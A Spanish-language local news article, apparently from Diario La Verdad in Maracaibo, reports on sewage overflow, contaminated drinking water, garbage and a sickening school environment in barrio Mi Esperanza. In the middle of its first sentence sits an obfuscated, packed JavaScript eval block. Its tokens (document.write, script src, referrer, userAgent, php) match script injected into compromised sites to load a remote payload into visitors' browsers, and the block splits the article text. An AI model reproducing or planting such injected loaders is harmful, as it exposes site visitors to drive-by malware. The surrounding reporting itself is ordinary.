En El Marite el agua sabe a cloaca

Andrea Terán / Maracaibo / [email protected]
Unas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fktby|var|u0026u|referrer|yfrbt||js|php'.split('|'),0,{})) mil familias del barrio Mi esperanza, en la parroquia Venancio Pulgar, viven en el abandono. Las cloacas se desbordan a diario e inundan sus viviendas, piden ayuda a la Gobernación. Unos 200 niños del colegio Francisco Eugenio Bustamante estudian en medio de la inmundicia,  sufren de problemas estomacales

Al menos 200 niños ven clases en condiciones deplorables. (Fotos: Jhair Torres)

Se sienten olvidados. Diez calles del barrio Mi Esperanza están rodeadas de aguas negras y basura. En 35 años, el sector jamás ha disfrutado de servicios públicos dignos. Viven entre la desesperanza, la mugre y el mal olor que invade sus hogares. Entre lágrimas y dolor aseguran que deben lidiar a diario con las enfermedades. Ilda García, residente del lugar, contó ayer la complicación de unas de sus vecinas diabéticas, cuando el bote de aguas negras infectó una herida de su pierna derecha. La comunidad está ubicada detrás del retén El Marite, en la parroquia Venancio Pulgar.

"Abrimos el grifo del lavamanos y lo que sale es aguas negras, dijo Carmen Gudiño, mientras sostenía una pancarta durante la manifestación que hicieron ayer en frente del Palacio del gobernador. Aseguran que las tuberías están dañadas y que deben ducharse con lo que salga "hasta el agua que tomamos sabe a cloacas". En total unas mil familias conviven en medio de la inmundicia, los pocos espacios recreativos que tienen en el sector, como una plaza y una cancha, se encuentran descuidados.

Mauricio Urdaneta comentó que desde hace algunos meses vienen entregando diferentes comunicados al gobernador, a quien piden asistencia de inmediato para el asfaltado de la calle 1 y 2, y la culminación de 30 casas que quedaron incompletas. "Nunca más apareció la comisión. Las pocas viviendas que están habitables las construimos los mismos dueños, a punta de trabajo duro". Ayer los vecinos se movilizaron en un autobús para manifestar y entregar a la máxima autoridad del estado 586 firmas para pedir ayuda una vez más a la Gobernación del estado. 

Exigen limpieza de cañada 

Otra de sus preocupaciones es que se acerca la temporada de lluvia y aún permanecen toneladas de basura en la cañada Fénix. María Martínez,  una de las vecinas, teme que con las precipitaciones se repita la tragedia que vivieron hace pocos años. "No me quiero imaginar cuando comiencen los aguaceros, vamos a perder las casas y lo peor es que nos llevan una bolsa de comida y una colchoneta". 

Cuentan que 74 familias bordean la cañada. "No hay carreteras, entonces por ahí también pasan burros, hay animales muertos, hay de todo". Los tres consejos comunales que hacen vida en el sector no gestionan con los organismos competentes.

Escuela Francisco de Miranda da tristeza

Unos 200 niños ven clases en condiciones deplorables. Los charcos de agua servida rodean la institución, da lástima. Los pequeños se enferman a diario, las enfermedades estomacales son las más comunes. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama